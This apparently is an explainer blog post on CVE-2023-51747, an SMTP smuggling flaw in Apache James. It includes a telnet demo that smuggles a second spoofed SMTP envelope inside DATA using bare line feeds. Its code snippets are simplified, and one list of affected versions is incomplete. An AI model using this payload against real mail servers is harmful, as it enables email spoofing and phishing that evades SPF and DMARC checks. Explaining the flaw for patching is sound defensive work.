CVE-2023-51747 - SMTP Smuggling Vulnerability in Apache James

Apache James, a popular open-source email server, recently faced a serious security flaw—CVE-2023-51747. This issue, impacting versions prior to 3.8.1 and 3.7.5, puts your mail server at risk of SMTP smuggling attacks. If you're managing a James server, keep reading: this exclusive guide breaks down the problem simply, shows how an attacker could exploit it, and tells you what you should do next.

What’s the Problem?

SMTP smuggling is an attack where bad actors trick mail servers by using clever line-ending tricks. In James’s case, its lax handling of line delimiters (how it recognizes the end of a message line) allows for “differences in interpretation” between what the sender and the receiver think the email actually contains.

Why does this matter?
This confusion can be abused by attackers to forge the envelope of SMTP messages. That means someone could sneak an email past SPF (Sender Policy Framework) checks—your basic defense against email spoofing and phishing.

Apache James < 3.7.5 (Older branch)

If you’re running either of these, you are at risk.

How Does the SMTP Smuggling Work?

The issue comes down to how James processes line delimiters during the SMTP DATA command. Email lines are supposed to end with \r\n (CRLF), but James would sometimes accept just \n.

Let’s compare the correct and vulnerable input handling.

Correct (Patched Version – Enforces CRLF)

if (!line.endsWith("\r\n")) {
    // Invalid line ending, reject message
    rejectMessage();
}

Vulnerable (Pre-patch Version – Too Lenient)

if (line.endsWith("\n")) {
    // Accepts LF alone, which is not RFC-compliant
    processLine(line);
}

What can an attacker do?

A hacker can send extra lines or split the message in tricky ways, causing the server to interpret the email differently than security checks (like SPF or DMARC) intended. They might prepend or append their own SMTP envelope data, making the James server relay a spoofed email.

Here’s a simplified demo using telnet to connect to a vulnerable James SMTP server

telnet mail.example.com 25

SMTP Commands

EHLO attacker.com
MAIL FROM:<evil@attacker.com>
RCPT TO:<victim@example.com>
DATA
From: Friendly <someone@trusted.com>
To: victim@example.com
Subject: You’ve been tricked

Real message content.

.\nMAIL FROM:<other@spoofed.com>\nRCPT TO:<victim2@example.com>\nDATA\nSpoofed message here.\n.
QUIT

Notice the use of \n instead of \r\n as a line separator. While other security tools might check for standard CRLF (\r\n), the vulnerable versions of James would misinterpret the boundaries, allowing smuggled or spoofed mail to sneak past anti-abuse checks.

The Fix: Strict CRLF Enforcement

The patch to Apache James strictly enforces CRLF (\r\n) as the required line separator for DATA command processing. If a client tries to end a line differently (say just \n), the message is rejected.

If you're curious, check the official patch:
Patch link: GitHub Commit for CVE-2023-51747